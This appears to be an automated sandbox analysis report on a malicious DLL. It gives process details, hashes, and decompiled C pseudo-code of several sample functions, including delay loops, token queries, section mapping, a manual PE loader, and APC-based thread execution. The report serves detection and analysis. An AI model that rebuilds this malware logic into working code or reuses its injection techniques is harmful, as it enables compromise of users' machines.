Imagebase:	0x50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3684 Parent PID: 800

General

Start time:	16:21:30
Start date:	07/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7e25b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5716 Parent PID: 3684

General

Start time:	16:21:30
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2
Imagebase:	0x50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 796 Parent PID: 980 loaddll32.exeCOMMON

Executed Functions

Function 00FA7DD8, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FA7DD8(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xfad22c; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xfad1f0, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xfad22c; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xfad1f0, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xfad1f0, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xfad22c; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xfad230; // 0x2a9a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xfae825; // 0x73797325
				_t83 = E00FA99D3(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xfad1f0, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xfad230; // 0x2a9a5a8
				_t16 = _t93 + 0xfae846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00fa7de1
0x00fa7de7
0x00fa7de9
0x00fa7e03
0x00fa7e07
0x00fa7e0a
0x00fa807f
0x00fa8086
0x00fa8086
0x00fa7e10
0x00fa7e25
0x00fa7e27
0x00fa7e2b
0x00fa7e2e
0x00fa806f
0x00fa8079
0x00000000
0x00fa8079
0x00fa7e34
0x00fa7e3f
0x00fa7e44
0x00fa7e49
0x00fa7e4c
0x00fa7e53
0x00fa7e5a
0x00fa7e5d
0x00fa805f
0x00fa8069
0x00000000
0x00fa8069
0x00fa7e73
0x00fa7e77
0x00fa7e7a
0x00fa7e7d
0x00fa7e85
0x00fa7e88
0x00fa7e91
0x00fa7e97
0x00fa7ea1
0x00fa7ea8
0x00fa7ea8
0x00fa7eba
0x00fa7ec5
0x00fa7ed3
0x00fa7ed8
0x00fa7edd
0x00fa7ee0
0x00fa7ee5
0x00fa7eef
0x00fa7ef2
0x00fa7ef5
0x00fa7f0b
0x00fa7f0f
0x00fa7f12
0x00fa805d
0x00000000
0x00fa805d
0x00fa7f29
0x00fa7f7a
0x00fa7f3d
0x00fa7f45
0x00fa7f4a
0x00fa7f58
0x00fa7f61
0x00fa7f6a
0x00fa7f6a
0x00fa7f78
0x00fa7f78
0x00fa7f7e
0x00fa7f82
0x00fa7f82
0x00fa7f88
0x00000000
0x00000000
0x00fa7f8a
0x00fa7f90
0x00fa8037
0x00fa803a
0x00fa8047
0x00fa8047
0x00fa804b
0x00000000
0x00000000
0x00fa8040
0x00fa8044
0x00fa8044
0x00fa8046
0x00fa8046
0x00fa8050
0x00fa8057
0x00fa8059
0x00000000
0x00fa8059
0x00fa7f96
0x00fa7f98
0x00fa7f98
0x00fa7fab
0x00fa7fb1
0x00fa7fbc
0x00fa7fbe
0x00fa7fc2
0x00fa7fc4
0x00fa7fc4
0x00fa7fc9
0x00fa7fcb
0x00fa7fcb
0x00fa7fc9
0x00fa7fd0
0x00fa7fd4
0x00fa7fd4
0x00fa7fe4
0x00fa7fe9
0x00fa7fec
0x00fa7fec
0x00fa7fef
0x00fa7ff9
0x00fa8001
0x00fa8006
0x00fa8014
0x00fa8014
0x00fa8028
0x00fa802c
0x00fa802c

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00FAD2E0), ref: 00FA7E03
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FA7E25
memset.NTDLL ref: 00FA7E3F

Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FA7E58,73797325), ref: 00FA99E4
Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FA99FE

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FA7E7D
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FA7E91
CloseHandle.KERNEL32(?), ref: 00FA7EA8
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FA7EB4
lstrcat.KERNEL32(?,642E2A5C), ref: 00FA7EF5
FindFirstFileA.KERNELBASE(?,?), ref: 00FA7F0B
CompareFileTime.KERNEL32(?,?), ref: 00FA7F29
FindNextFileA.KERNELBASE(00FA9865,?), ref: 00FA7F3D
FindClose.KERNEL32(00FA9865), ref: 00FA7F4A
FindFirstFileA.KERNEL32(?,?), ref: 00FA7F56
CompareFileTime.KERNEL32(?,?), ref: 00FA7F78
StrChrA.SHLWAPI(?,0000002E), ref: 00FA7FAB
memcpy.NTDLL(00FA3FAE,?,00000000), ref: 00FA7FE4
FindNextFileA.KERNELBASE(00FA9865,?), ref: 00FA7FF9
FindClose.KERNEL32(00FA9865), ref: 00FA8006
FindFirstFileA.KERNEL32(?,?), ref: 00FA8012
CompareFileTime.KERNEL32(?,?), ref: 00FA8022
FindClose.KERNELBASE(00FA9865), ref: 00FA8057
HeapFree.KERNEL32(00000000,00FA3FAE,73797325), ref: 00FA8069
HeapFree.KERNEL32(00000000,?), ref: 00FA8079

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID:
API String ID: 455834338-0
Opcode ID: 1d0eafc8d0fc2926db175246ddab2201d19ddc79b8964dc448d5a423bf0baba5
Instruction ID: a5ef745c4d92ae39450e0f2b4c31dffa397d9dd8da42f497b81882b6f604248e
Opcode Fuzzy Hash: 1d0eafc8d0fc2926db175246ddab2201d19ddc79b8964dc448d5a423bf0baba5
Instruction Fuzzy Hash: A68149B2D00209EFDB109FA5DC84EEEBBB9FB4A340F10446AE501E2250D7749A44EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001000, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001000(intOrPtr _a4) {
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				long _v60;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				void* _t28;
				long _t31;
				long _t32;
				void* _t41;
				intOrPtr _t43;
				long _t48;
				intOrPtr _t49;
				signed int _t50;
				void* _t57;
				signed int _t61;
				void* _t63;
				intOrPtr* _t64;

				_t21 = E1000166F();
				_v52 = _t21;
				if(_t21 != 0) {
					L21:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t50 = 9;
					_t61 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t50;
					_t26 = E100018B4(0, _t61); // executed
					_v56 = _t26;
					Sleep(_t61 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L21;
				}
				_t27 = E100015F2(_t50); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L19:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L21;
				}
				if(_a4 != 0) {
					L11:
					_t28 = CreateThread(0, 0, __imp__SleepEx,  *0x1000414c, 0, 0); // executed
					_t63 = _t28;
					if(_t63 == 0) {
						L18:
						_v56 = GetLastError();
						goto L19;
					}
					_t31 = QueueUserAPC(E1000116E, _t63,  &(_v44.wSecond)); // executed
					if(_t31 == 0) {
						_t48 = GetLastError();
						TerminateThread(_t63, _t48);
						CloseHandle(_t63);
						_t63 = 0;
						SetLastError(_t48);
					}
					if(_t63 == 0) {
						goto L18;
					} else {
						_t32 = WaitForSingleObject(_t63, 0xffffffff);
						_v60 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t63,  &_v60); // executed
						}
						CloseHandle(_t63);
						goto L19;
					}
				}
				if(E10001B50(_t50,  &_v48) != 0) {
					 *0x10004138 = 0;
					goto L11;
				}
				_t49 = _v48;
				_t64 = __imp__GetLongPathNameW;
				_t41 =  *_t64(_t49, 0, 0); // executed
				_t57 = _t41;
				if(_t57 == 0) {
					L9:
					 *0x10004138 = _t49;
					goto L11;
				}
				_t15 = _t57 + 2; // 0x2
				_t43 = E10001BD2(_t57 + _t15);
				 *0x10004138 = _t43;
				if(_t43 == 0) {
					goto L9;
				}
				 *_t64(_t49, _t43, _t57); // executed
				E100019CF(_t49);
				goto L11;
			}

0x1000100c
0x10001015
0x10001019
0x1000115f
0x10001165
0x00000000
0x00000000
0x00000000
0x1000101f
0x1000101f
0x10001024
0x1000102a
0x10001039
0x1000103a
0x1000103d
0x10001040
0x10001049
0x1000104d
0x10001053
0x10001057
0x1000105e
0x00000000
0x00000000
0x10001064
0x1000106b
0x1000106f
0x10001150
0x10001150
0x10001157
0x10001159
0x10001159
0x00000000
0x10001157
0x10001078
0x100010cb
0x100010dd
0x100010e3
0x100010e7
0x10001146
0x1000114c
0x00000000
0x1000114c
0x100010f4
0x10001102
0x1000110a
0x1000110e
0x10001115
0x10001118
0x1000111a
0x1000111a
0x10001122
0x00000000
0x10001124
0x10001127
0x1000112f
0x10001133
0x1000113b
0x1000113b
0x10001142
0x00000000
0x10001142
0x10001122
0x10001086
0x100010c5
0x00000000
0x100010c5
0x10001088
0x1000108c
0x10001095
0x10001097
0x1000109b
0x100010bd
0x100010bd
0x00000000
0x100010bd
0x1000109d
0x100010a2
0x100010a9
0x100010ae
0x00000000
0x00000000
0x100010b3
0x100010b6
0x00000000

APIs

Part of subcall function 1000166F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,10001011), ref: 1000167E
Part of subcall function 1000166F: GetVersion.KERNEL32(?,10001011), ref: 1000168D
Part of subcall function 1000166F: GetCurrentProcessId.KERNEL32(?,10001011), ref: 1000169C
Part of subcall function 1000166F: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,10001011), ref: 100016B5

GetSystemTime.KERNEL32(?), ref: 10001024
SwitchToThread.KERNEL32 ref: 1000102A

Part of subcall function 100018B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000190A
Part of subcall function 100018B4: memcpy.NTDLL(?,10001045,?,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000199C
Part of subcall function 100018B4: VirtualFree.KERNELBASE(10001045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 100019B7

Sleep.KERNELBASE(00000000,00000000), ref: 1000104D
GetLongPathNameW.KERNEL32 ref: 10001095
GetLongPathNameW.KERNEL32 ref: 100010B3
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 100010DD
QueueUserAPC.KERNELBASE(1000116E,00000000,?), ref: 100010F4
GetLastError.KERNEL32 ref: 10001104
TerminateThread.KERNEL32(00000000,00000000), ref: 1000110E
CloseHandle.KERNEL32(00000000), ref: 10001115
SetLastError.KERNEL32(00000000), ref: 1000111A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10001127
GetExitCodeThread.KERNELBASE(00000000,?), ref: 1000113B
CloseHandle.KERNEL32(00000000), ref: 10001142
GetLastError.KERNEL32 ref: 10001146
GetLastError.KERNEL32 ref: 10001159

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: 5e131395b6e8ee9ff1b3bb63a92e1ddb9bf3dbf1e668ccabee51a70913d2dfca
Instruction ID: b2810128257585a89669d1407e68cd0258d721067d3a17ee8238cd138ffee35b
Opcode Fuzzy Hash: 5e131395b6e8ee9ff1b3bb63a92e1ddb9bf3dbf1e668ccabee51a70913d2dfca
Instruction Fuzzy Hash: 3B41B371405661ABF312EF658CC88DFBBEDEBC57D0B014A1AF951C2158EB30D944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FA7925, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00FA7925(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00FA550F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00FAA07B(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00fa7932
0x00fa7933
0x00fa7934
0x00fa7935
0x00fa7936
0x00fa793a
0x00fa7941
0x00fa7950
0x00fa7953
0x00fa7956
0x00fa795d
0x00fa7960
0x00fa7963
0x00fa7966
0x00fa7969
0x00fa7974
0x00fa7976
0x00fa797f
0x00fa7987
0x00fa7989
0x00fa799b
0x00fa79a5
0x00fa79a9
0x00fa79b8
0x00fa79bc
0x00fa79c5
0x00fa79cd
0x00fa79cd
0x00fa79cf
0x00fa79cf
0x00fa79d7
0x00fa79dd
0x00fa79e1
0x00fa79e1
0x00fa79ec

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00FA796C
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00FA797F
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FA799B

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FA79B8
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00FA79C5
NtClose.NTDLL(00000000), ref: 00FA79D7
NtClose.NTDLL(00000000), ref: 00FA79E1

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 9bc624c908619b099707d2bd4789ed43e87ddb9bc07888f7d4259187da7eeb96
Instruction ID: 31d2597b924daa80d3eda787435018ef1ff6179e1eee071f139c65f9a2b795b1
Opcode Fuzzy Hash: 9bc624c908619b099707d2bd4789ed43e87ddb9bc07888f7d4259187da7eeb96
Instruction Fuzzy Hash: 6321E5B2A0021CBBDB01AF95CC85DDEBFBDEF09750F104026F905E6161D7759A45EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001C22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10001C22(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001AD1(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x10001c2b
0x10001c32
0x10001c33
0x10001c34
0x10001c35
0x10001c36
0x10001c47
0x10001c4b
0x10001c5f
0x10001c62
0x10001c65
0x10001c6c
0x10001c6f
0x10001c76
0x10001c79
0x10001c7c
0x10001c7f
0x10001c84
0x10001cbf
0x10001c86
0x10001c89
0x10001c8f
0x10001c94
0x10001c98
0x10001cb6
0x10001c9a
0x10001ca1
0x10001caf
0x10001caf
0x10001c98
0x10001cc7

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00000002), ref: 10001C7F

Part of subcall function 10001AD1: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001C94,00000002,00000000,?,?,00000000,?,?,10001C94,?), ref: 10001AFE

memset.NTDLL ref: 10001CA1

Strings

@, xrefs: 10001C6F

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction ID: 7cdd0864037accd0d9c91a557a1398572669c0b1d8c8e005f6ffc6b71ca10c32
Opcode Fuzzy Hash: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction Fuzzy Hash: F8211DB5D00209AFDB11CFA9C8859DEFBF9FF48354F104529E506F7210D730AA448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001B13, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10001B13(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x10001b17
0x10001b28
0x10001b30
0x10001b32
0x10001b45
0x10001b45
0x10001b4f

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,1000163E,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001B28
GetSystemDefaultUILanguage.KERNEL32(?,?,1000163E,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001B32
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,1000163E,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001B45

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: f130e9cac5bd96a94216972ee320fc07ba3693e86004bdbc49fafef2dbdab7d9
Instruction ID: 3de892749f2506132d90ec2e0237679401a7ce80bb2951cf583b000507d8d988
Opcode Fuzzy Hash: f130e9cac5bd96a94216972ee320fc07ba3693e86004bdbc49fafef2dbdab7d9
Instruction Fuzzy Hash: 53E04FA4641249B6F700DB91CD0AFBA73ACEB0078AF500044FB01E60C4E7B49E04A725

Uniqueness

Uniqueness Score: -1.00%

Function 10001252, Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E10001252(void* __eax, void* __edx) {
				char _v8;
				void** _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				void** _t36;
				intOrPtr _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E10001314( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t34 = _v8;
					_t28 = E100016DB( &_v8, _t34, _t35);
					if(_t28 == 0) {
						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
						_t23 = E10001792(_t34, _t38); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E10001CCA(_t38, _t31, _t34); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t34);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					_t36[6](NtClose( *_t36));
					E100019CF(_t36);
					L8:
					return _t28;
				}
			}

0x10001252
0x1000125a
0x10001277
0x1000127e
0x100012dd
0x00000000
0x10001280
0x10001280
0x1000128a
0x1000128e
0x10001293
0x10001297
0x1000129c
0x100012a0
0x100012a5
0x100012aa
0x100012ae
0x100012b3
0x100012b4
0x100012b8
0x100012bd
0x100012c5
0x100012c5
0x100012bd
0x100012ae
0x100012a0
0x100012c7
0x100012d0
0x100012d4
0x100012de
0x100012e4
0x100012e4

APIs

Part of subcall function 10001314: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,1000127C,?,?,?,00000002,?,?,?), ref: 10001339
Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 1000135B
Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 10001371
Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 10001387
Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 1000139D
Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 100013B3

Part of subcall function 100016DB: memcpy.NTDLL(?,00000002,1000128A,?,0000000A,?,?,?,1000128A,?,0000000A,?,?,?,00000002), ref: 10001708
Part of subcall function 100016DB: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 1000173B

NtClose.NTDLL(?,?,0000000A,?,?,?,00000002,?,?,?,?), ref: 100012CC

Part of subcall function 10001792: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 100017C8
Part of subcall function 10001792: lstrlenA.KERNEL32(00000002), ref: 100017DE
Part of subcall function 10001792: memset.NTDLL ref: 100017E8
Part of subcall function 10001792: GetProcAddress.KERNEL32(?,00000002), ref: 1000184B
Part of subcall function 10001792: lstrlenA.KERNEL32(-00000002), ref: 10001860
Part of subcall function 10001792: memset.NTDLL ref: 1000186A

Part of subcall function 10001CCA: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 10001CF8
Part of subcall function 10001CCA: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001D4F
Part of subcall function 10001CCA: GetLastError.KERNEL32(?,?), ref: 10001D55

GetLastError.KERNEL32(?,?,?,?), ref: 100012BF

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

